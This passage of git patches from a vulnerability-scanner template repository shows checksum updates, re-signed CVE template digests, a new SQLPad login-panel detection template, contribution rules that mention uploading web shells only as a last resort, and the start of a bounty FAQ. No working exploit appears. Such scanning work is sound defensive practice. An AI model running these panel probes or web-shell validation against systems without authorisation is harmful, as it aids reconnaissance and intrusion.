+http/technologies/wordpress/plugins/otter-blocks.yaml:8784ec0ebbb9d17db100401ad7ea8a9a68731c70 +http/technologies/wordpress/plugins/password-protected.yaml:82c97799403ceaf274a2ea14ebaf5cd3bdfb21bd +http/technologies/wordpress/plugins/pdf-embedder.yaml:48da9e25f12c2da6d603792d3358009e5283434d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c924e0dfc993d209d7a07681572a159a7f082bca -http/technologies/wordpress/plugins/pixelyoursite.yaml:6a45ce7e490536e4e74cc45fde9d7f31289a7c6a -http/technologies/wordpress/plugins/polylang.yaml:9ed44e370e2d9a7bc5df17df30df9901073da9b6 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:7ae7f748295d77b64260d2b1ab02759d0a287a69 +http/technologies/wordpress/plugins/pixelyoursite.yaml:84275bef57b39fb334777c2d5d58bbb9d10c783e +http/technologies/wordpress/plugins/polylang.yaml:989c458f8d4af44157ccefede2561aa11ceb48e3 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:33c9ec72822f736ffe455b092db6cc0953173531 -http/technologies/wordpress/plugins/post-smtp.yaml:65d4e65645c3d9d818196316b5acf0dbec2c5aa7 -http/technologies/wordpress/plugins/post-types-order.yaml:54e73657301529f6321cbe21af0b23aaefbc92dc -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:d136280e2f1b6d6e5e1485b7d61090b409c90fca -http/technologies/wordpress/plugins/pretty-link.yaml:0b5ad9dcdd82f06180902b64f6ff40d465b24d4a -http/technologies/wordpress/plugins/really-simple-captcha.yaml:6a35bb16a12dc0910e7a94a2f208031c6aa8a688 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:450c6d656d821d7a36dc9e47700a5a6ee1f56dec -http/technologies/wordpress/plugins/redirection.yaml:6a78a1970587db03dca73831da0e43d8c0528698 -http/technologies/wordpress/plugins/redux-framework.yaml:1ef332a69142fc5cb46e489ff20759c00780cbbf -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:00d5bea920aefa396073a2aeb8ccb195f46e6be6 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:86e55e5c9f633422f534df5742785d48b7da662c -http/technologies/wordpress/plugins/safe-svg.yaml:c32fb6215851ce4073aa9d5eb099f451bf31a16c -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:d8fa8ebfb93088fdb6c6c797c41f934455359783 -http/technologies/wordpress/plugins/sg-cachepress.yaml:e8b7d3026358f246c70904435f5297b548431366 -http/technologies/wordpress/plugins/sg-security.yaml:4ffa9bb1fc6e8ee64dd646d919c8b0d3d60da6d4 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:f4327cfdadcc4dab91f75e4749bd7ee36e487be3 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:68aa5661ab916f468cff90d9979b3727c62ff767 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:fe61b8dc522dd01cbdb2fdff657dcb1bc8360bda -http/technologies/wordpress/plugins/simple-history.yaml:cb0294bec1fd1cf426383536cda466ca20919c9f +http/technologies/wordpress/plugins/popup-maker.yaml:af608daa92ff4482633729e9eee2b6029f704b5d +http/technologies/wordpress/plugins/post-smtp.yaml:54ef33676b42206f7ab7ae4873a16a39659c5da4 +http/technologies/wordpress/plugins/post-types-order.yaml:c343d8a1ae322d053d84944f2d4b8d99650176d5 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:373a31f876b2a65b64082ffad1a6edf19229c830 +http/technologies/wordpress/plugins/pretty-link.yaml:467b7b29868c3e3ee0aaa38a09ca3e5ca1028ca2 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:b6b3a3fbecbc7e89bab7f99e4c61f0b55c5f03c9 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:4d5252fd89c108932529b22de94c666d84f6b273 +http/technologies/wordpress/plugins/redirection.yaml:1bab1a20b9fdd244c46bb287285e5f48b92eda17 +http/technologies/wordpress/plugins/redux-framework.yaml:44d143b9cebdb45a1b4968ba72a3d3b348f6a7da +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:342babc4c8634d30fa42f511d8a12fd3b47caa1e +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:a5f2aeac25f05f4f822402be5893ae517ad11191 +http/technologies/wordpress/plugins/safe-svg.yaml:6dfccda5682560d3c86085b4cf41b5f0feb24e33 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:01026da6fe426ebe97c359fecb4cbf207990258c +http/technologies/wordpress/plugins/sg-cachepress.yaml:1864e29e5010eccadf3d6b6994df546ffcab63c0 +http/technologies/wordpress/plugins/sg-security.yaml:7df5c0dd3371d65b6cdbda55015e9d45d56062b5 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:c1bd0fc6c3c4f1f8dc9277c3f6fc7ffe3b52b693 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:62050c642f9e79a75c366a084aa30b7219426a2d +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:67aecc68b838d0d03249b6e0315b8c5d85640eb2 +http/technologies/wordpress/plugins/simple-history.yaml:cb0836faf80b63de39d1f5b73a36e41e4dbf5ad1 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:c00dbcf1a542bc6f8fe627fe0b38df4831382052 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bc23d16720ae6bb23052599efc918d1efde40100 -http/technologies/wordpress/plugins/smart-slider-3.yaml:e6240b053f3ef8cff438f7b2a8ec8ee8adfd8911 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:1261be18c89581b54211fc1454ad205ac9765394 +http/technologies/wordpress/plugins/siteguard.yaml:dab955108151069815f7ca5f93fc36e8f21eec7f +http/technologies/wordpress/plugins/siteorigin-panels.yaml:2815140719c2f91ec20f7dc1dc8755eed71566b0 +http/technologies/wordpress/plugins/smart-slider-3.yaml:0f81f0a409e281d95f59dace51d784b5cf299402 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:d98cc7a116d1142c88c0f1d4eb02bacdf391c68f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:4592ff2cb3a37da2cc24d7179fbca2aad8f22d96 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:6ae3c05b9ebf8bab1d6a0dca557163fcae82c765 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:c0aafc72dec1615f0f5aeef603d9db1d402eb96a -http/technologies/wordpress/plugins/svg-support.yaml:52578e9ed008dd2d2f0e0dc6c2d5925fb755cc8d +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:67036719b530eae2b46449d26223ef37787007ad +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:e6a289e18ea810493ce899110aab37d3a04c596c +http/technologies/wordpress/plugins/sucuri-scanner.yaml:1862f4a2b28da45c227ebb785b264883357cc877 +http/technologies/wordpress/plugins/svg-support.yaml:9505619c97fe88c313eaaba4af5f8819aef54e64 http/technologies/wordpress/plugins/table-of-contents-plus.yaml:142cf7dc3d34ed35422ad91447b3f1f986d965b6 -http/technologies/wordpress/plugins/tablepress.yaml:dd609c4f74198caec31fe4d30a3c2f6b6fd3d977 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:75685f886278e1ad443bc82277966114bc81b6c4 -http/technologies/wordpress/plugins/templately.yaml:f0489d04b058b54440decd0d228837c248c6f520 -http/technologies/wordpress/plugins/the-events-calendar.yaml:8e8bfbb20b38dc1b413d66031af95feeeabdf42c +http/technologies/wordpress/plugins/tablepress.yaml:ed67150aff573073ada9b9f047ce20816224d468 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:73289b9f6b7137e6648d4479bc83ba919d3a0798 +http/technologies/wordpress/plugins/templately.yaml:d966a1374f24e1c91b7ce616c86e8e972a73efb4 +http/technologies/wordpress/plugins/the-events-calendar.yaml:01deb46f69a657b2e5fe93e0ad820f7e5c3e625d http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:046cec680f4385370ba065b7600d33631e98d7e5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:478c484da5ff29bed652541ecf42db76d1520428 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:633d3dd6b2d60c7590d137d8b804b8d2f769f53b -http/technologies/wordpress/plugins/under-construction-page.yaml:a9cf1b8434921edb4b1a3a9db888085677e9f49a +http/technologies/wordpress/plugins/tinymce-advanced.yaml:4ea5d3fa654355fdf809c041b53f3d260992efe8 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:642537aaf6a36017d61dd13f70c512d28cbc5ea7 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:0268df7e9b8c304886e91f305c99be09f63b5b6f +http/technologies/wordpress/plugins/under-construction-page.yaml:5c733c7215e17dba97d0d4a5b0f774aa6f408128 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:20a8a174faa7800022a046d66c96066965e1de36 +http/technologies/wordpress/plugins/updraftplus.yaml:dee2da64021b2470bd01a6cbafca4ff6b96e7604 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:0fd0787dcb2e7ed8e97ee92457a3dfbfc9bca48d +http/technologies/wordpress/plugins/user-role-editor.yaml:d4e16a20ee9131765fa4c90db6432e527ae17316 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:ce2e7ce2a1897a2fa572a6715d0422581783173e -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:89c11c65c1433d9f5c7f5c16ef68f6bbb32a8c55 -http/technologies/wordpress/plugins/webp-express.yaml:359af0b41793e96e8aa53d03d9434fe2c1b79512 +http/technologies/wordpress/plugins/w3-total-cache.yaml:0ee2b559398976d743a955a70dcf247f92d1b082 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:c0c162c255af64c980918e45392d907e84e39f06 +http/technologies/wordpress/plugins/webp-express.yaml:9949e1c257127f00ebca652e80aecf6e859c7bca http/technologies/wordpress/plugins/widget-importer-exporter.yaml:6704a9b4d0dcda2afcbac6ec83aab1e38ff1f0dc -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:4d23e1bcc90d6308c69da019716aeac0ad82bca1 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:3058e82fab68d8df7626c73c01ace157540a2c08 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6cb2fb0efbb91a15a17df9fe8905ebae3bffceb4 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:34f122f8fbe94d9218379925b45b284a965d3d41 http/technologies/wordpress/plugins/woo-inpost.yaml:ccc431985c9227d06dce6cd78efea4b46ddf791c -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:05ccfe193ebf693bdb5df47c9b4fd99e697fabbb +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:914519caea8814cf19f349d862da3728fd62e9c4 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:7a6dfca9b6cc63354fce1410c596ced129d34a3d -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:46a4cf67e3f93cdc4edd5e95e13fb9c4b2d4129d -http/technologies/wordpress/plugins/woocommerce-payments.yaml:66aff197f00e739b485a4b27caa149fd8f64b4e6 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:bdd51984942b47f5937457835e76f6b35c1cd9cf -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:f419e62a8683c32d6cb96f07c26be98a085105b1 -http/technologies/wordpress/plugins/woocommerce-services.yaml:366bc767ccfd075a4f4672d6a15424a8deb5f071 -http/technologies/wordpress/plugins/woocommerce.yaml:29d19da0bae34c2fbd263a64a523361260db1880 -http/technologies/wordpress/plugins/wordfence.yaml:a3a85625a9d685a58fa2cc7d257f436dedb2f3aa -http/technologies/wordpress/plugins/wordpress-importer.yaml:2ccfef415b6ec122aa61e9d4737fd2dda4146ce5 -http/technologies/wordpress/plugins/wordpress-seo.yaml:d469e16965325c5e4fc2d77d205bbf90081cffe8 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:3de6f1fa956f3107124440917df31d39834414d0 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:26282c77f9f34bf9c680dfb465cecbd92c294628 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:d44efdd852f1ef72ce3281dc2b7765bd07bb2c4d +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:1eb4f6cfd6bb241478a374deda5b3fc0574d0ced +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:6da5522b5ea2603e50f38903ba4b31bdad100813 +http/technologies/wordpress/plugins/woocommerce-services.yaml:6a8d00096a3b8297a775d9601954066bcb018177 +http/technologies/wordpress/plugins/woocommerce.yaml:cb414ba0ddb0684ce346de7e8df338b4a902768d +http/technologies/wordpress/plugins/wordfence.yaml:77bcbd28c475aeda6756ab3cd81247deac8fd87b +http/technologies/wordpress/plugins/wordpress-importer.yaml:bb8ee2dcce8e6da2a420bc4e36b3fee9faad8144 +http/technologies/wordpress/plugins/wordpress-seo.yaml:d767ab512b5f28f52130cc8afada2d272297dabd http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:02b6affe837473c1d05cee0d0f41278befd22113 -http/technologies/wordpress/plugins/wp-crontrol.yaml:14102e615506fcce551862caa481cf03e8869ae6 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:d5677654a93ce728d21f1f772a4423ff1f052f59 -http/technologies/wordpress/plugins/wp-file-manager.yaml:3ebaec68b7b25448d1d1487945d6d2d784663330 -http/technologies/wordpress/plugins/wp-google-maps.yaml:5530ff9fe285899a3b185bf4251b3f57576896e7 -http/technologies/wordpress/plugins/wp-mail-logging.yaml:7f7825e4cb201bf9ff9fcf22f7a8f75893498fed -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:c2f6ee9946ac5dfe3ddb8954bd79dc9c11cae481 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:44970d92ae23d479b85de1638a5ea447969ff460 +http/technologies/wordpress/plugins/worker.yaml:55571a65dd3d5dd636931ba979d076ebd8e8c766 +http/technologies/wordpress/plugins/wp-crontrol.yaml:586325872ddaf9e3c05109fa32383f8940a07e49 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:335e7344857a8848248c0271bbc04adebe3d4d37 +http/technologies/wordpress/plugins/wp-file-manager.yaml:7ac74777fe13114ed754e8ca1e04e32787130c6a +http/technologies/wordpress/plugins/wp-google-maps.yaml:c17e09e1140886696bd0c619fc34f468b54928f0 +http/technologies/wordpress/plugins/wp-mail-logging.yaml:793a3daa98dfce1e73221e17aea38c68620ffea7 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:52fd6bed3d3053a25e37401a7e48798b11c13287 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:5f995d5a765399422f41a303dfc10564554f5194 http/technologies/wordpress/plugins/wp-migrate-db.yaml:e4d387e29ada0961b3320d2b69e8773746ca268a -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:9fd574aea7e31e8af8f7bfb08cfc829fb01c3280 -http/technologies/wordpress/plugins/wp-optimize.yaml:ed4c22fe0d5bbaae4b179f43a1523d0f90104ba1 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:3527d9e895162c560b292a3a1ac5c5961ccca771 -http/technologies/wordpress/plugins/wp-reset.yaml:7ecb5d3e10ddef11541fbd5701ebeb7d8abe0219 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:75d611e5caa1d824f5187a6fe43f1c99650d8e04 -http/technologies/wordpress/plugins/wp-rollback.yaml:ac074234e0c5126b0f9bf0e727cd611c5fc2fe11 -http/technologies/wordpress/plugins/wp-seopress.yaml:99e6ba2b348581092fef2f4836935ebc0483acb9 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:329c42c857f483581221233c6b5f418985e5a082 -http/technologies/wordpress/plugins/wp-smushit.yaml:8be8acc42d04aa9b1e6e663ae9a1f0ddb2e19947 -http/technologies/wordpress/plugins/wp-statistics.yaml:69e80936d29ef4886fde0861a3a38dc05614a405 -http/technologies/wordpress/plugins/wp-super-cache.yaml:983f988d243b3c1747e1842690e5044c628ccae5 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:cff6f17259f5111006d99d2e806252e08ea7f24e +http/technologies/wordpress/plugins/wp-optimize.yaml:a9bb5b8abfeb704cbda31bea53252584c86c6713 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:4a7c415685c15b3ddcbf1ef5439546455c002c71 +http/technologies/wordpress/plugins/wp-reset.yaml:4b9ec2af37bdbc5fc96125709ef1c27857a514f1 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:bb14633c0b7a58edcc7b1184a18771eb237f8862 +http/technologies/wordpress/plugins/wp-rollback.yaml:90dfded8eaff3a5dcde798b4fea0a001cf7f82ba +http/technologies/wordpress/plugins/wp-seopress.yaml:71e1b086df225fa9ee199426dca167f882d60a9a +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:5bf17b89434109061a62517b8e4c9c3c087d30e1 +http/technologies/wordpress/plugins/wp-smushit.yaml:dcb60514f4ff63e3571f24eabdbe3ec0f9d5a9b9 +http/technologies/wordpress/plugins/wp-statistics.yaml:ae62acd8704c4706253e43c9c977678e13beb742 +http/technologies/wordpress/plugins/wp-super-cache.yaml:5d88c3626d62e3df359c7a8d26f4aafa06d1bf28 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:62cac2d74cf7b7032a5d9a480fafd9b0726fd68b -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:33bcd257d611bbc8e84c98b5257b24ba18b7722c -http/technologies/wordpress/plugins/wpforms-lite.yaml:57900f7ba4816260007591a66a01ba830e822f11 -http/technologies/wordpress/plugins/wps-hide-login.yaml:f4b5c98cd8b9a7fe1254db33904c1cc49905e3fa -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:6ced16e367162fe503295572359970522331f417 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:efefad163eeb2f30bf2264348f4a5ac8fc001c71 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da6400bb71a3d99ece1b379a73116541b31cc93a +http/technologies/wordpress/plugins/wpforms-lite.yaml:2eb67b0dfbc266ddfa62cd20cf0654f3b71a81a3 +http/technologies/wordpress/plugins/wps-hide-login.yaml:5e0ee6b66a65312646aa9a20ffee777b73ced2c6 +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:a31eeabc5080f34a6ef5c8d7e9f8549c5b8728b4 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:b3123ab3ee85b4c20c15d546eb854fd56bb86b7b +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:1d33a75ebfa1d2e3f465cb7dd4b66d297cd3f104 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:cf9a544627bf169a3572f810cd893cecdfdaec2d http/technologies/wordpress-detect.yaml:743b35c9139a66a10e24776aabe59d58f5e4f63c http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -9487,7 +9488,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2c0bda8a4435eb2c8b10ef6614803427226d7703 +templates-checksum.txt:fb981ef70dda84fa021cb2a3cff88af7ba5f060e wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2b3941f92ad984183c232244a0a9b13941dfa2d7 Mon Sep 17 00:00:00 2001 From: ghost Date: Wed, 16 Oct 2024 06:53:28 +0000 Subject: [PATCH 172/218] =?UTF-8?q?chore:=20sign=20templates=20?= =?UTF-8?q?=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- http/cves/2024/CVE-2024-32736.yaml | 3 +-- http/cves/2024/CVE-2024-32737.yaml | 3 +-- http/cves/2024/CVE-2024-32738.yaml | 3 +-- http/cves/2024/CVE-2024-32739.yaml | 2 ++ http/cves/2024/CVE-2024-45488.yaml | 3 +-- 5 files changed, 6 insertions(+), 8 deletions(-) diff --git a/http/cves/2024/CVE-2024-32736.yaml b/http/cves/2024/CVE-2024-32736.yaml index 01cd9bd5bc..f00ab54e28 100644 --- a/http/cves/2024/CVE-2024-32736.yaml +++ b/http/cves/2024/CVE-2024-32736.yaml @@ -56,5 +56,4 @@ http: group: 1 regex: - '"code":"([0-9.]+)"' - -# digest: 4b0a00483046022100c53a68d8602f8407408a7e2ac80ae83eb5f2c3a1a7784869a365ec42e77dbe8a02210083168d966666dc59f2e036227f315cf8325a7f2e310c0fe34718cd471c4e6e51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220471d727be0f332c5e331561df5516703428243450173cc483c4ef4ff72ce3389022005f4175fb431fa8affbe961db64e9b763ed5b351bcb0fc46a5f5fbf729aef997:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32737.yaml b/http/cves/2024/CVE-2024-32737.yaml index f122d4aef4..162e062ebc 100644 --- a/http/cves/2024/CVE-2024-32737.yaml +++ b/http/cves/2024/CVE-2024-32737.yaml @@ -53,5 +53,4 @@ http: group: 1 regex: - '"modifiedtime":"([0-9.]+)"' - -# digest: 490a0046304402204ea4981591285e766ca2596537a9ae7ae69c7aaf2aa391d555cf777d1540a8080220792ae00f07355787738a033cc38ba51140eb704f3135269e980a9d2f64d0f467:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022051cdfff72585a5fcc6ca9e3128c5983a113eed88a37cd983efda2e5e3c85945a0221009cdce70febb52d0a585c55563bee91fdfdfe2bcbbb156e165b76d2f55aed4885:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32738.yaml b/http/cves/2024/CVE-2024-32738.yaml index 36d828fbbd..77cfab2252 100644 --- a/http/cves/2024/CVE-2024-32738.yaml +++ b/http/cves/2024/CVE-2024-32738.yaml @@ -54,5 +54,4 @@ http: group: 1 regex: - '"modifiedtime":"([0-9.]+)"' - -# digest: 4a0a00473045022068f55aa572b03b7f0890f54dfd9dd91e9a9609a646883bd8e2512174f1e98d6a022100c8419d9bbf41d60e68b66a77b1bc6194afb1f26fdf925d7fd00275fbb7a70b25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220584dc71a6ba20c795ec2d94378d76a0b8883b2aa46a3d2f22fa00d04c5ec0dc0022100cb0c75fdba525d1fea9de7c23b08c5904bf843f8287329770611cc1257a0908c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32739.yaml b/http/cves/2024/CVE-2024-32739.yaml index 388dd4d2b7..214a16a96d 100644 --- a/http/cves/2024/CVE-2024-32739.yaml +++ b/http/cves/2024/CVE-2024-32739.yaml @@ -52,3 +52,5 @@ http: group: 1 regex: - '"code":"([0-9.]+)"' + +# digest: 4b0a00483046022100fbba0916ea93e23792903e13822a024da4145477a0fe5be9d0319fd5599fb6bf022100cf5bb4ac915a13c315177ad92b237c743a7cbc3823e6e04bce75d9692b35f414:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-45488.yaml b/http/cves/2024/CVE-2024-45488.yaml index c1b4a74e0f..3350706ffc 100644 --- a/http/cves/2024/CVE-2024-45488.yaml +++ b/http/cves/2024/CVE-2024-45488.yaml @@ -315,5 +315,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a2ece1f3c1f563345188e6bd58b7fdb7125daa11d1f4030ac80e39f7b445e95a02200db92360d521ced0bb816bc06eb9b6296d479ce4f607445282854fc80962c1d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c1e04d6c3c9b3781cddc3a25c1575a5ba79913fcb113b949659cbe6f87802da4022100ffc7b910822ab03f153975956bc9be2f175452f64a182962f4c3f93e1b7f68c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 01ba62b08804f07b5e44176fad3396fc9091feb7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 16 Oct 2024 16:11:04 +0700 Subject: [PATCH 173/218] fixed json --- contributors.json | 1 + 1 file changed, 1 insertion(+) diff --git a/contributors.json b/contributors.json index b670a26f6e..bd0e3a551b 100644 --- a/contributors.json +++ b/contributors.json @@ -1457,6 +1457,7 @@ "linkedin": "", "website": "https://rxerium.com", "email": "rishi@rxerium.com" + } }, { "author": "edoardottt", From b074f3fba0a03836a69cacc972eec7212b4c93e4 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Wed, 16 Oct 2024 12:50:39 +0300 Subject: [PATCH 174/218] add sqlpad panel --- http/exposed-panels/sqlpad-panel.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 http/exposed-panels/sqlpad-panel.yaml diff --git a/http/exposed-panels/sqlpad-panel.yaml b/http/exposed-panels/sqlpad-panel.yaml new file mode 100644 index 0000000000..903ecab1e5 --- /dev/null +++ b/http/exposed-panels/sqlpad-panel.yaml @@ -0,0 +1,27 @@ +id: sqlpad-panel + +info: + name: SQLPad Panel - Detect + author: s4e-io + severity: info + description: | + SQLPad panel was discovered. + reference: + - https://github.com/sqlpad/sqlpad + metadata: + verified: true + max-request: 1 + fofa-query: "SQLPad" + tags: panel,login,sqlpad,detect + +http: + - method: GET + path: + - "{{BaseURL}}/signin" + + matchers: + - type: dsl + dsl: + - 'contains_any(body, "SQLPad", "webpackJsonpsqlpad")' + - 'status_code == 200' + condition: and From eb361262aa585855afd34a89b5f99ab580482ae7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 16 Oct 2024 17:03:10 +0700 Subject: [PATCH 175/218] Update CONTRIBUTING.md --- CONTRIBUTING.md | 1 + 1 file changed, 1 insertion(+) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 2f06d9f610..97b12af797 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -56,6 +56,7 @@ Along with the P.O.C following are the required fields in the info section for s - If there are more than 1 template for a tech create a separate folder for it - Don't share any vulnerable URL publicly on Github or Discord channel. - We should only upload a web shell as a last resort to validate the vulnerability, and if we do upload a file, make sure the file name is random(`{{randstr}}`) +- Do not include code templates for exploits that can be written using HTTP or JavaScript. We avoid adding additional exploit code to the project unless there is an exception. ### **Submitting a PR** From 2aaeb34af4b44f6478a0edbc800ef740c4e55c4f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 16 Oct 2024 17:24:31 +0700 Subject: [PATCH 176/218] Create Community-Rewards-FAQ.md --- Community-Rewards-FAQ.md | 72 ++++++++++++++++++++++++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 Community-Rewards-FAQ.md diff --git a/Community-Rewards-FAQ.md b/Community-Rewards-FAQ.md new file mode 100644 index 0000000000..148a743b0b --- /dev/null +++ b/Community-Rewards-FAQ.md @@ -0,0 +1,72 @@ +# Nuclei Templates Community Rewards Program - FAQ + +## What is the purpose of this rewards program? +The program is designed to reward the community for their efforts in contributing high-quality templates for critical and trending vulnerabilities. + +## What are the bounty ranges for template submissions? +Bounties range from **$50 to $250**, depending on the complexity of the template and the effort required. + +## Where can I find bounty issues? +Only issues listed by us on our GitHub repository with the 💎 **Bounty** label are eligible for rewards. You can find these bounty issues [here](https://github.com/projectdiscovery/nuclei-templates/issues?q=is%3Aissue%20state%3Aopen%20label%3A%22%F0%9F%92%8E%20Bounty%22) + +## What is the acceptance criteria for templates? +Templates must meet the following criteria: +1. **Complete POC**: A full Proof of Concept (POC) must be provided and not rely solely on version detection. +2. **Debug Data**: Include debug data to assist with template validation. +3. **Validation Required**: The template will be reviewed and validated before rewards are given. +4. **Accurate Matchers**: Use strong matchers to avoid false positives. 